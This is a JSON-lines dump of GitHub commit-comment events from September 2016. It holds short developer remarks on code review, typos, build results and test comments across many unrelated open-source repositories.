{"id":"4540193223","type":"CommitCommentEvent","actor":{"login":"abhikeshav"},"repo":{"name":"manradhaCisco/ydk-gen"},"payload":{"comment":{"id":18963165,"position":13,"line":174,"path":"ydkgen/printer/cpp/header_printer.py","commit_id":"1a0624d6765f8b90527368d4fb00ccbe05da080f","created_at":"2016-09-09T13:55:47Z","updated_at":"2016-09-09T13:55:47Z","body":"> EntityPath get_entity_path(ydk::Entity* parent) const;\r\n\r\nSince this function is meant to be getting the relative entity path, is something like the below a better name for it?\r\n\r\n`EntityPath get_relative_path_to_ancestor(ydk::Entity* ancestor) const;`"}},"created_at":"2016-09-09T13:55:47Z"}
{"id":"4540194106","type":"CommitCommentEvent","actor":{"login":"Morendil"},"repo":{"name":"sgmap/beta.gouv.fr"},"payload":{"comment":{"id":18963166,"position":4,"line":4,"path":"_author/Tommy.md","commit_id":"8ecac7530e0d47ee6a34f9b4bae047cdc7800fbd","created_at":"2016-09-09T13:55:57Z","updated_at":"2016-09-09T13:55:57Z","body":"ey?"}},"created_at":"2016-09-09T13:55:57Z"}
{"id":"4540194739","type":"CommitCommentEvent","actor":{"login":"kbraak"},"repo":{"name":"gbif/portal-web"},"payload":{"comment":{"id":18963168,"position":null,"line":null,"path":null,"commit_id":"1d60e291eef58113542f0e3b07e8847118cf3b0d","created_at":"2016-09-09T13:56:04Z","updated_at":"2016-09-09T13:56:04Z","body":"@cgendreau @mdoering \r\n\r\nThis is a small fix open for review, needed to show the license again on the occurrence detail page. \r\n\r\nWe want to show the interpreted license based on the dataset, not the verbatim license record as this may or may not conform with the interpreted license. \r\n\r\nI suppose we could also show the cc icon beside the license to raise its visibility even more. A screenshot below demonstrates how the change looks currently.\r\n\r\n![screen shot 2016-09-09 at 15 53 18](https://cloud.githubusercontent.com/assets/5981100/18389286/9c3d0996-76a5-11e6-914b-2dac28dc169a.png)\r\n"}},"created_at":"2016-09-09T13:56:04Z"}
{"id":"4540200310","type":"CommitCommentEvent","actor":{"login":"orthagh"},"repo":{"name":"glpi-project/glpi"},"payload":{"comment":{"id":18963182,"position":52,"line":353,"path":"inc/apirest.class.php","commit_id":"daacda142ed18dc2a635833765bafb6104c2a321","created_at":"2016-09-09T13:57:06Z","updated_at":"2016-09-09T13:57:06Z","body":"The paragraph in the rfc says also:\r\n```\r\nAny HTTP/1.1 message containing an entity-body SHOULD include a Content-Type header field defining the media type of that body.\r\n```\r\n\r\nSo ok for the default content-type as apirest queries is in this one.\r\nBut i think, @newls, you should precise the headers in case of not null bodies"}},"created_at":"2016-09-09T13:57:06Z"}
{"id":"4540201425","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18963188,"position":null,"line":null,"path":null,"commit_id":"f0abd864ae4464c10e7bd6a6f712acec25744a55","created_at":"2016-09-09T13:57:18Z","updated_at":"2016-09-09T13:57:18Z","body":"test_build_branch (lefticus) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1499 of 1499 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f0abd864ae4464c10e7bd6a6f712acec25744a55-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f0abd864ae4464c10e7bd6a6f712acec25744a55-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f0abd864ae4464c10e7bd6a6f712acec25744a55-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.66%25-green.svg)</a>\n"}},"created_at":"2016-09-09T13:57:18Z"}
{"id":"4540205904","type":"CommitCommentEvent","actor":{"login":"hamsternik"},"repo":{"name":"rasendubi/dotfiles"},"payload":{"comment":{"id":18963202,"position":null,"line":null,"path":null,"commit_id":"a6db3678f7800609ab929525bf35444876843410","created_at":"2016-09-09T13:58:08Z","updated_at":"2016-09-09T13:58:08Z","body":"> OS X could fix that issue/implement feature but haven't done that. The fact root cause is not OS X doesn't mean OS X has nothing to do with the issue.\r\nThe reason that Apple can fixed that not tells that it's good, especially when it's a BSD-default application. \r\n\r\n> I generally find OS X command-line tools less friendly than Linux ones.\r\nIn which cases you observed this?\r\n\r\n> Furthermore, fixing commit message means force-pushing -- I'm not in favor even if I agree with you. \r\nOK, but it's such a sexism behavior for OS X side. "}},"created_at":"2016-09-09T13:58:08Z"}
{"id":"4540206452","type":"CommitCommentEvent","actor":{"login":"yohanakh"},"repo":{"name":"xap/xap"},"payload":{"comment":{"id":18963203,"position":5,"line":355,"path":"xap-core/xap-datagrid/src/main/java/net/jini/discovery/LookupLocatorDiscovery.java","commit_id":"82bd3a16c56233b9303497becd8ddec2545d2933","created_at":"2016-09-09T13:58:13Z","updated_at":"2016-09-09T13:58:13Z","body":"This reverts a temporary commit.\r\nThe fix is committed on master branch: https://github.com/xap/xap/commit/79ad1f024409e98a9dd69681e47c9ed56f76f59e"}},"created_at":"2016-09-09T13:58:13Z"}
{"id":"4540207677","type":"CommitCommentEvent","actor":{"login":"yohanakh"},"repo":{"name":"xap/xap"},"payload":{"comment":{"id":18963204,"position":null,"line":null,"path":null,"commit_id":"82bd3a16c56233b9303497becd8ddec2545d2933","created_at":"2016-09-09T13:58:25Z","updated_at":"2016-09-09T13:58:25Z","body":"This reverts a temporary commit.\r\nThe fix is committed on master branch: https://github.com/xap/xap/commit/79ad1f024409e98a9dd69681e47c9ed56f76f59e"}},"created_at":"2016-09-09T13:58:25Z"}
{"id":"4540207814","type":"CommitCommentEvent","actor":{"login":"gavinking"},"repo":{"name":"ceylon/ceylon"},"payload":{"comment":{"id":18963205,"position":5,"line":88,"path":"language/src/ceylon/language/Object.ceylon","commit_id":"83d6a60d9f078187670f4dd812ecce53d046c99a","created_at":"2016-09-09T13:58:27Z","updated_at":"2016-09-09T13:58:27Z","body":"Well:\r\n\r\n1. `small` is a hint. It's ignored on non-Java platforms.\r\n2. It's already documented to be 32-bit, so it's weird to not annotate that fact.\r\n3. It *does* fit the semantics."}},"created_at":"2016-09-09T13:58:27Z"}
{"id":"4540209854","type":"CommitCommentEvent","actor":{"login":"hamsternik"},"repo":{"name":"rasendubi/dotfiles"},"payload":{"comment":{"id":18963213,"position":null,"line":null,"path":null,"commit_id":"a6db3678f7800609ab929525bf35444876843410","created_at":"2016-09-09T13:58:51Z","updated_at":"2016-09-09T13:58:51Z","body":"> OS X could fix that issue/implement feature but haven't done that. The fact root cause is not OS X doesn't mean OS X has nothing to do with the issue.\r\n\r\nThe reason that Apple can fixed that not tells that it's good, especially when it's a BSD-default application.\r\n\r\n> I generally find OS X command-line tools less friendly than Linux ones.\r\n\r\nIn which cases you observed this?\r\n\r\n> Furthermore, fixing commit message means force-pushing -- I'm not in favor even if I agree with you. \r\n\r\nOK, but it's such a sexism behavior for OS X side."}},"created_at":"2016-09-09T13:58:51Z"}
{"id":"4540211339","type":"CommitCommentEvent","actor":{"login":"jcalovski"},"repo":{"name":"jcalovski/Stockfish"},"payload":{"comment":{"id":18963218,"position":null,"line":null,"path":null,"commit_id":"06ad9452e38318003f0c628e327971aad625a762","created_at":"2016-09-09T13:59:08Z","updated_at":"2016-09-09T13:59:08Z","body":"and yes can modify first condition instead \r\nmake_score(mbonus, ebonus + eg_value(score) / 8)"}},"created_at":"2016-09-09T13:59:08Z"}
{"id":"4540212006","type":"CommitCommentEvent","actor":{"login":"RJacksonm1"},"repo":{"name":"frankred/htmly-kuh"},"payload":{"comment":{"id":18963221,"position":null,"line":null,"path":null,"commit_id":"0870aeb02e1564e8e45079b01675e85b8aa11d83","created_at":"2016-09-09T13:59:15Z","updated_at":"2016-09-09T13:59:15Z","body":"GitHub just e-mailed me because of this commit, but this commit was made over a year ago. I'm confused."}},"created_at":"2016-09-09T13:59:15Z"}
{"id":"4540222861","type":"CommitCommentEvent","actor":{"login":"Astro36"},"repo":{"name":"Team-Meta/MinePet"},"payload":{"comment":{"id":18963246,"position":117,"line":0,"path":"MinePet.js","commit_id":"d6f93004e36b5f7794d0269b7a9cb2f84c3a0054","created_at":"2016-09-09T14:01:11Z","updated_at":"2016-09-09T14:01:11Z","body":"Where is prototype?"}},"created_at":"2016-09-09T14:01:11Z"}
{"id":"4540225298","type":"CommitCommentEvent","actor":{"login":"orthagh"},"repo":{"name":"glpi-project/glpi"},"payload":{"comment":{"id":18963249,"position":52,"line":353,"path":"inc/apirest.class.php","commit_id":"daacda142ed18dc2a635833765bafb6104c2a321","created_at":"2016-09-09T14:01:34Z","updated_at":"2016-09-09T14:01:34Z","body":"See #956 for resolution"}},"created_at":"2016-09-09T14:01:34Z"}
{"id":"4540225410","type":"CommitCommentEvent","actor":{"login":"FDarnese"},"repo":{"name":"FDarnese/eLearning"},"payload":{"comment":{"id":18963250,"position":null,"line":null,"path":null,"commit_id":"0365b235b172869453bca67ec74e91e28bdc677d","created_at":"2016-09-09T14:01:35Z","updated_at":"2016-09-09T14:01:35Z","body":"Yep that's the way to go!!!  Cool :+1: "}},"created_at":"2016-09-09T14:01:35Z"}
{"id":"4540225741","type":"CommitCommentEvent","actor":{"login":"sirmordred"},"repo":{"name":"Coldwindofnowhere/android_device_samsung_aries-common"},"payload":{"comment":{"id":18963251,"position":null,"line":null,"path":null,"commit_id":"83eaf92431293bc1ce7e773a62ddd5f688a29e5e","created_at":"2016-09-09T14:01:39Z","updated_at":"2016-09-09T14:01:39Z","body":"did this work for you? cuz im suffering the same data problem on my device(ancora)"}},"created_at":"2016-09-09T14:01:39Z"}
{"id":"4540229210","type":"CommitCommentEvent","actor":{"login":"thiagosolstafir"},"repo":{"name":"thiagosolstafir/mp"},"payload":{"comment":{"id":18963262,"position":1,"line":1,"path":"includes/css/mobile.css","commit_id":"c0167ce53f72c68371525994a6dae8da962432e9","created_at":"2016-09-09T14:02:18Z","updated_at":"2016-09-09T14:02:18Z","body":"alterar mascara"}},"created_at":"2016-09-09T14:02:18Z"}
{"id":"4540231330","type":"CommitCommentEvent","actor":{"login":"itsamti"},"repo":{"name":"beckyricha/Broadlink-RM-SmartThings-Alexa"},"payload":{"comment":{"id":18963267,"position":null,"line":null,"path":null,"commit_id":"62f4e2eb22d7031b27f01fa42dbf53e8549234f7","created_at":"2016-09-09T14:02:40Z","updated_at":"2016-09-09T14:02:40Z","body":"Sure. I have cleaned code a little. Please review now.\r\nPhysicalOn and Off are new tiles in switch , I could see only toggle button with your device handler.\r\n\r\nPlease see snapshot below\r\n\r\nOriginal\r\nhttps://drive.google.com/open?id=0B_9gawYeVIWtQnMwRkI5T2ZuTENySFl3SjR5WDRKdkE2OWYw\r\n\r\nwith Physical buttons\r\nhttps://drive.google.com/open?id=0B_9gawYeVIWtcGI0UHZfR2xBSE5qNkxWNVNWaEdPVmRDNEY0\r\n\r\nIf you think its not needed. Let me know, I can remove it in version uploaded in git.\r\n"}},"created_at":"2016-09-09T14:02:40Z"}
{"id":"4540234019","type":"CommitCommentEvent","actor":{"login":"mingmLiang"},"repo":{"name":"mingmLiang/cici"},"payload":{"comment":{"id":18963272,"position":1,"line":1,"path":"README.md","commit_id":"986af6acc7387f4130e512a297ee5e0b9ab96d47","created_at":"2016-09-09T14:03:11Z","updated_at":"2016-09-09T14:03:11Z","body":"love world!\r\n\r\n"}},"created_at":"2016-09-09T14:03:11Z"}
{"id":"4540237940","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-commons"},"payload":{"comment":{"id":18963281,"position":11,"line":121,"path":"xwiki-commons-core/xwiki-commons-extension/xwiki-commons-extension-handlers/xwiki-commons-extension-handler-jar/src/main/java/org/xwiki/extension/jar/internal/handler/JarExtensionHandler.java","commit_id":"404d934355c21ecfedfd1dca795b157b5079125d","created_at":"2016-09-09T14:03:55Z","updated_at":"2016-09-09T14:03:55Z","body":"typo: s/unregistere/unregister"}},"created_at":"2016-09-09T14:03:55Z"}
{"id":"4540240994","type":"CommitCommentEvent","actor":{"login":"Astro36"},"repo":{"name":"Team-Meta/MinePet"},"payload":{"comment":{"id":18963285,"position":102,"line":0,"path":"MinePet.js","commit_id":"d6f93004e36b5f7794d0269b7a9cb2f84c3a0054","created_at":"2016-09-09T14:04:30Z","updated_at":"2016-09-09T14:04:30Z","body":"You don't have to add this line. It also changes constructor. (MakePet → Object)\n\nvar pet = new MakePet();\npet.constructor // Object"}},"created_at":"2016-09-09T14:04:30Z"}
{"id":"4540243377","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-commons"},"payload":{"comment":{"id":18963291,"position":49,"line":192,"path":"xwiki-commons-core/xwiki-commons-extension/xwiki-commons-extension-handlers/xwiki-commons-extension-handler-jar/src/main/java/org/xwiki/extension/jar/internal/handler/JarExtensionHandler.java","commit_id":"404d934355c21ecfedfd1dca795b157b5079125d","created_at":"2016-09-09T14:04:57Z","updated_at":"2016-09-09T14:04:57Z","body":"s/components/component "}},"created_at":"2016-09-09T14:04:57Z"}
{"id":"4540243412","type":"CommitCommentEvent","actor":{"login":"PhilippSchwarze"},"repo":{"name":"PhilippSchwarze/website"},"payload":{"comment":{"id":18963293,"position":4,"line":9,"path":"index.html","commit_id":"d0617fa139cb763ee7538f27cc2d5e08f66064a6","created_at":"2016-09-09T14:04:58Z","updated_at":"2016-09-09T14:04:58Z","body":"#that is really the title?"}},"created_at":"2016-09-09T14:04:58Z"}
{"id":"4540244012","type":"CommitCommentEvent","actor":{"login":"maass-bezirk"},"repo":{"name":"Bezirk-Bosch/AdapterZirks"},"payload":{"comment":{"id":18963295,"position":12,"line":12,"path":"OBDAdapter/obdadapterzirk/src/main/java/com/bezirk/adapter/obd/events/RequestObdLiveDataEvent.java","commit_id":"6edb6a0d40601f0e4ce192019e83777eb74e182d","created_at":"2016-09-09T14:05:05Z","updated_at":"2016-09-09T14:05:05Z","body":"Bezirk messages don't use topics anymore. You can delete this field from your events."}},"created_at":"2016-09-09T14:05:05Z"}
{"id":"4540249545","type":"CommitCommentEvent","actor":{"login":"vemv"},"repo":{"name":"thoughtbot/til"},"payload":{"comment":{"id":18963351,"position":null,"line":null,"path":null,"commit_id":"8a0754440a27151e6e4d4f37d8c64c7276fcaa7c","created_at":"2016-09-09T14:06:09Z","updated_at":"2016-09-09T14:06:09Z","body":"A great use case is constructing canonical URLs (for SEO), something which is typically not very precise with Rails.\r\n\r\nPity it's not part of the public API though!"}},"created_at":"2016-09-09T14:06:09Z"}
{"id":"4540250925","type":"CommitCommentEvent","actor":{"login":"ralphbean"},"repo":{"name":"fedora-infra/pdc-updater"},"payload":{"comment":{"id":18963381,"position":null,"line":null,"path":null,"commit_id":"b046ac7d99ebee18d01eba25ab0c92ec3d242381","created_at":"2016-09-09T14:06:23Z","updated_at":"2016-09-09T14:06:23Z","body":"[Onomatopoeiacally](https://www.google.com/webhp?sourceid=chrome-instant&ion=1&espv=2&ie=UTF-8#q=klaxon)."}},"created_at":"2016-09-09T14:06:23Z"}
{"id":"4540255980","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":18963485,"position":null,"line":null,"path":null,"commit_id":"86b01ce62793797ac77f1168a428b468cebed687","created_at":"2016-09-09T14:07:18Z","updated_at":"2016-09-09T14:07:18Z","body":"**[unitTests_js_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_js_branches/32473/testReport/) for this commit**"}},"created_at":"2016-09-09T14:07:18Z"}
{"id":"4540264038","type":"CommitCommentEvent","actor":{"login":"jonathanbardo"},"repo":{"name":"godaddy/wp-primer-theme"},"payload":{"comment":{"id":18963512,"position":14,"line":109,"path":"inc/hooks.php","commit_id":"86ab0394ca3e3e82f73e7b74acd3062564ed8ac3","created_at":"2016-09-09T14:08:47Z","updated_at":"2016-09-09T14:08:47Z","body":"Oh my bad!"}},"created_at":"2016-09-09T14:08:47Z"}
{"id":"4540265961","type":"CommitCommentEvent","actor":{"login":"DaveByBox"},"repo":{"name":"apache/cordova-ios"},"payload":{"comment":{"id":18963522,"position":null,"line":null,"path":null,"commit_id":"816fceebc00d302f646cacd18820f2006300c877","created_at":"2016-09-09T14:09:11Z","updated_at":"2016-09-09T14:09:11Z","body":"Hi, I'm new to this, but looking at this it implies that ios-deploy accepts arguments which AREN'T supported?\r\n\r\ne.g. of the FilteredSupportedArgs\r\n'--device', '--emulator', '--nobuild', '--list', '--target', '--debug', '--release'\r\n\r\nOnly --debug and --list seem to be supported?\r\n"}},"created_at":"2016-09-09T14:09:11Z"}
{"id":"4540267406","type":"CommitCommentEvent","actor":{"login":"wrath76"},"repo":{"name":"jkroepke/2Moons"},"payload":{"comment":{"id":18963527,"position":null,"line":null,"path":null,"commit_id":"5768ea3a12ad67e40b7b241721916497e3db372b","created_at":"2016-09-09T14:09:25Z","updated_at":"2016-09-09T14:09:25Z","body":"Thanks for this it helps......also wanted to ask you, were to place screen shots..pic et, on the login screen its blank and not sure were to redirect to a folder for ? thanks"}},"created_at":"2016-09-09T14:09:25Z"}
{"id":"4540268277","type":"CommitCommentEvent","actor":{"login":"jinloooong"},"repo":{"name":"jinloooong/holle_World"},"payload":{"comment":{"id":18963529,"position":null,"line":null,"path":null,"commit_id":"be7d198ffc668c7876db7874036b0543aa319351","created_at":"2016-09-09T14:09:34Z","updated_at":"2016-09-09T14:09:34Z","body":"hfkhjfjhfkj"}},"created_at":"2016-09-09T14:09:34Z"}
{"id":"4540269021","type":"CommitCommentEvent","actor":{"login":"Fr3ddy7"},"repo":{"name":"modxcms/evolution"},"payload":{"comment":{"id":18963531,"position":null,"line":null,"path":null,"commit_id":"ffebc6b52e0599117499f1c294eb6dc421790bb3","created_at":"2016-09-09T14:09:42Z","updated_at":"2016-09-09T14:09:42Z","body":"\r\nwhere did you get a black lock icon? I want to replace other icons :)"}},"created_at":"2016-09-09T14:09:42Z"}
{"id":"4540276767","type":"CommitCommentEvent","actor":{"login":"XueMingXiao"},"repo":{"name":"XueMingXiao/Saliency"},"payload":{"comment":{"id":18963549,"position":4,"line":4,"path":"README.md","commit_id":"ab0c0b26846fb3878d638b9b7bd1d9d0d77d5e8e","created_at":"2016-09-09T14:11:12Z","updated_at":"2016-09-09T14:11:12Z","body":"The code is implemented by Matlab R2015b"}},"created_at":"2016-09-09T14:11:12Z"}
{"id":"4540278966","type":"CommitCommentEvent","actor":{"login":"hvelarde"},"repo":{"name":"collective/collective.cover"},"payload":{"comment":{"id":18963553,"position":null,"line":null,"path":null,"commit_id":"f6a9127305068846231b6a76d3b08abcd2aeefdc","created_at":"2016-09-09T14:11:34Z","updated_at":"2016-09-09T14:11:34Z","body":"I think we forgot to document that on the README file."}},"created_at":"2016-09-09T14:11:34Z"}
{"id":"4540281481","type":"CommitCommentEvent","actor":{"login":"lzmartinico"},"repo":{"name":"pqarmitage/keepalived"},"payload":{"comment":{"id":18963558,"position":null,"line":null,"path":null,"commit_id":"fd44ee51b1d3deab3b2ace8a40bfc6d1f1081b45","created_at":"2016-09-09T14:12:03Z","updated_at":"2016-09-09T14:12:03Z","body":"The VrrpRestarted signal should be declared in the interface file"}},"created_at":"2016-09-09T14:12:03Z"}
{"id":"4540283617","type":"CommitCommentEvent","actor":{"login":"devcurmudgeon"},"repo":{"name":"JanderJLR/ybd"},"payload":{"comment":{"id":18963560,"position":null,"line":null,"path":null,"commit_id":"de47f4bdb291ec882705628e9da34c6513d0333d","created_at":"2016-09-09T14:12:26Z","updated_at":"2016-09-09T14:12:26Z","body":"good idea!"}},"created_at":"2016-09-09T14:12:26Z"}
{"id":"4540285611","type":"CommitCommentEvent","actor":{"login":"jeanconn"},"repo":{"name":"sot/anneal_pathfinder"},"payload":{"comment":{"id":18963563,"position":null,"line":null,"path":null,"commit_id":"9bebf18d912f88e2bf5da7a74a8d3682b0d6a6a7","created_at":"2016-09-09T14:12:48Z","updated_at":"2016-09-09T14:12:48Z","body":"Missing comma, and load_arrays doesn't seem to take a staterror keyword argument."}},"created_at":"2016-09-09T14:12:48Z"}
{"id":"4540290904","type":"CommitCommentEvent","actor":{"login":"jvasileff"},"repo":{"name":"ceylon/ceylon"},"payload":{"comment":{"id":18963578,"position":5,"line":88,"path":"language/src/ceylon/language/Object.ceylon","commit_id":"83d6a60d9f078187670f4dd812ecce53d046c99a","created_at":"2016-09-09T14:13:46Z","updated_at":"2016-09-09T14:13:46Z","body":"Why would it need to be ignored on non-Java platforms? I think even in JavaScript you can use &mask or something to help out the runtime.\r\n\r\nIt's not documented as 32 bit. Rather, there's a note about special treatment on the JVM.\r\n\r\nRegarding the semantics, surely other smalls don't do the same xor narrowing, I hope."}},"created_at":"2016-09-09T14:13:46Z"}
{"id":"4540290921","type":"CommitCommentEvent","actor":{"login":"hellais"},"repo":{"name":"measurement-kit/netprobe-ios"},"payload":{"comment":{"id":18963579,"position":null,"line":null,"path":null,"commit_id":"12babf20378608cd87e0cf4db5065201423d484c","created_at":"2016-09-09T14:13:46Z","updated_at":"2016-09-09T14:13:46Z","body":"You should not include the `.zip` file inside of the source tree."}},"created_at":"2016-09-09T14:13:46Z"}
{"id":"4540295262","type":"CommitCommentEvent","actor":{"login":"Miigon"},"repo":{"name":"Infinideastudio/NEWorld"},"payload":{"comment":{"id":18963599,"position":18,"line":52,"path":"src/server/server.h","commit_id":"8de0766bfcbcab5862b4d32bdf245275169bc0aa","created_at":"2016-09-09T14:14:32Z","updated_at":"2016-09-09T14:14:32Z","body":"`feature-new-network`\r\n不会直接内嵌任何网络库，而是为了提供一个可扩展的接口来处理网络\r\n因为不会涉及到百万请求，所以私以为那点查找虚表时间可忽略"}},"created_at":"2016-09-09T14:14:32Z"}
{"id":"4540302388","type":"CommitCommentEvent","actor":{"login":"ChengMurphy"},"repo":{"name":"iamcal/php-emoji"},"payload":{"comment":{"id":18963614,"position":3,"line":3,"path":"build/inc.css","commit_id":"284ecbc29d6d6b30ae32e8ca5a84b09a1e2c111a","created_at":"2016-09-09T14:15:51Z","updated_at":"2016-09-09T14:15:51Z","body":"d"}},"created_at":"2016-09-09T14:15:51Z"}
{"id":"4540303421","type":"CommitCommentEvent","actor":{"login":"XueMingXiao"},"repo":{"name":"XueMingXiao/Saliency"},"payload":{"comment":{"id":18963616,"position":4,"line":4,"path":"README.md","commit_id":"ab0c0b26846fb3878d638b9b7bd1d9d0d77d5e8e","created_at":"2016-09-09T14:16:00Z","updated_at":"2016-09-09T14:16:00Z","body":"---------------------------------------------------------"}},"created_at":"2016-09-09T14:16:00Z"}
{"id":"4540304682","type":"CommitCommentEvent","actor":{"login":"ChengMurphy"},"repo":{"name":"iamcal/php-emoji"},"payload":{"comment":{"id":18963620,"position":3,"line":3,"path":"build/inc.css","commit_id":"284ecbc29d6d6b30ae32e8ca5a84b09a1e2c111a","created_at":"2016-09-09T14:16:15Z","updated_at":"2016-09-09T14:16:15Z","body":"d"}},"created_at":"2016-09-09T14:16:15Z"}
{"id":"4540307986","type":"CommitCommentEvent","actor":{"login":"araykopotay"},"repo":{"name":"travis-ci/docs-travis-ci-com"},"payload":{"comment":{"id":18963625,"position":5,"line":15,"path":"_data/xcodes.yml","commit_id":"655cd6550ab732eb457685818ec115360e366729","created_at":"2016-09-09T14:16:50Z","updated_at":"2016-09-09T14:16:50Z","body":"+"}},"created_at":"2016-09-09T14:16:50Z"}
{"id":"4540309618","type":"CommitCommentEvent","actor":{"login":"dmitriysmirnovjb"},"repo":{"name":"dmitriysmirnovjb/HelloWorld"},"payload":{"comment":{"id":18963631,"position":null,"line":null,"path":null,"commit_id":"4067a116edf1136adc44672db1ec373454e3236d","created_at":"2016-09-09T14:17:09Z","updated_at":"2016-09-09T14:17:09Z","body":"Comment here"}},"created_at":"2016-09-09T14:17:09Z"}
{"id":"4540316810","type":"CommitCommentEvent","actor":{"login":"Cusiri1971"},"repo":{"name":"semiautomaticgit/SemiAutomaticClassificationPlugin"},"payload":{"comment":{"id":18963655,"position":null,"line":null,"path":null,"commit_id":"340ba9a2fa6379ab8035e7004fda5c6488fc1646","created_at":"2016-09-09T14:18:29Z","updated_at":"2016-09-09T14:18:29Z","body":">Some mistakes and typing errors resolved."}},"created_at":"2016-09-09T14:18:29Z"}
{"id":"4540320085","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":18963668,"position":null,"line":null,"path":null,"commit_id":"ab11598be1a768c237d4216a32f13c3681520aa4","created_at":"2016-09-09T14:19:07Z","updated_at":"2016-09-09T14:19:07Z","body":"The following doc(s) have been deployed to the [slashzerop](https://slashzerop-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/migrate-wordpress](https://slashzerop-static-docs.pantheonsite.io/docs/migrate-wordpress)\n"}},"created_at":"2016-09-09T14:19:07Z"}
{"id":"4540321218","type":"CommitCommentEvent","actor":{"login":"jvasileff"},"repo":{"name":"ceylon/ceylon-sdk"},"payload":{"comment":{"id":18963670,"position":5,"line":32,"path":"source/ceylon/collection/Cell.ceylon","commit_id":"e30b23ea918e7379043f64ae08d1244e3e1f91c3","created_at":"2016-09-09T14:19:20Z","updated_at":"2016-09-09T14:19:20Z","body":"Is this a good idea right before release?\r\n\r\nThis could make things faster, slower, or no change. I spent a lot of time benchmarking this stuff, and there were some *very* strange results mixing `long` and `int`.\r\n\r\nThere's also the possibility of bugs. What are the rules for `small`? Has it been fully tested?"}},"created_at":"2016-09-09T14:19:20Z"}
{"id":"4540324359","type":"CommitCommentEvent","actor":{"login":"joceron"},"repo":{"name":"mahyaa/teahub"},"payload":{"comment":{"id":18963680,"position":5,"line":11,"path":"app/services/impl/ApiTogglService.scala","commit_id":"8ed59e369f670cecee8e60baecea496e3847855b","created_at":"2016-09-09T14:19:53Z","updated_at":"2016-09-09T14:19:53Z","body":"Implementation?"}},"created_at":"2016-09-09T14:19:53Z"}
{"id":"4540325125","type":"CommitCommentEvent","actor":{"login":"jmarantz"},"repo":{"name":"pagespeed/ngx_pagespeed"},"payload":{"comment":{"id":18963684,"position":null,"line":null,"path":null,"commit_id":"269ed10ed56230d7b83bdb81e6b7cc1deaf3227f","created_at":"2016-09-09T14:20:02Z","updated_at":"2016-09-09T14:20:02Z","body":"lgtm"}},"created_at":"2016-09-09T14:20:02Z"}
{"id":"4540327493","type":"CommitCommentEvent","actor":{"login":"martindurant"},"repo":{"name":"Azure/azure-data-lake-store-python"},"payload":{"comment":{"id":18963692,"position":7,"line":50,"path":"adlfs/cli.py","commit_id":"eed2c47e537f8eaadb5c6ffcfc89ad703ac22fb0","created_at":"2016-09-09T14:20:28Z","updated_at":"2016-09-09T14:20:28Z","body":"If running up/downloading, expect the keyboardinterrupt to be handled there and not to propagate up. Also, I see that this function is recursive - can many exceptions fill the call stack or memory?"}},"created_at":"2016-09-09T14:20:28Z"}
{"id":"4540330214","type":"CommitCommentEvent","actor":{"login":"TranceAccount"},"repo":{"name":"TrinityCore/WowPacketParser"},"payload":{"comment":{"id":18963703,"position":null,"line":null,"path":null,"commit_id":"e2e529f295514220b5b05efcf3aba2b5a2eecec1","created_at":"2016-09-09T14:20:55Z","updated_at":"2016-09-09T14:20:55Z","body":"What did you change? ._."}},"created_at":"2016-09-09T14:20:55Z"}
{"id":"4540330813","type":"CommitCommentEvent","actor":{"login":"mizapf"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":18963707,"position":null,"line":null,"path":null,"commit_id":"3291684c2baf8d43c7300e0a2f7fc42b6ee8bcff","created_at":"2016-09-09T14:21:02Z","updated_at":"2016-09-09T14:21:02Z","body":"It could help to build better memorable names especially when you have software that has a numbering (1, 2, 3...) which takes away one character position, or where you want to indicate localized versions (German, French, international). Then you'll notice how few 8 characters can actually be. I mean, I somehow did it for the ti99 list, but at the cost of some really difficult letter combinations. It looks unnecessarily cryptic (initially I thought it was due to some DOS 8.3 legacy). "}},"created_at":"2016-09-09T14:21:02Z"}
{"id":"4540331717","type":"CommitCommentEvent","actor":{"login":"brian-rickman"},"repo":{"name":"Teradata/presto"},"payload":{"comment":{"id":18963709,"position":137,"line":137,"path":"presto-product-tests/src/main/java/com/facebook/presto/tests/jdbc/LdapTests.java","commit_id":"9eeba7e72715793aa41a1de88a84559ed034b83b","created_at":"2016-09-09T14:21:13Z","updated_at":"2016-09-09T14:21:13Z","body":"These tests require the same back-end configuration as the CLI LDAP tests, and I expect the JDBC LDAP functionality will be used by customers more often than the CLI LDAP functionality.  I think it is appropriate to test them together.\r\n\r\nIf Tempto does not support \"-g ldap -x simba_jdbc\" to support your scenario, then perhaps we need to add ldap_jdbc and ldap_cli groups."}},"created_at":"2016-09-09T14:21:13Z"}
{"id":"4540334297","type":"CommitCommentEvent","actor":{"login":"XueMingXiao"},"repo":{"name":"XueMingXiao/Saliency"},"payload":{"comment":{"id":18963716,"position":4,"line":4,"path":"README.md","commit_id":"ab0c0b26846fb3878d638b9b7bd1d9d0d77d5e8e","created_at":"2016-09-09T14:21:39Z","updated_at":"2016-09-09T14:21:39Z","body":"-----------------"}},"created_at":"2016-09-09T14:21:39Z"}
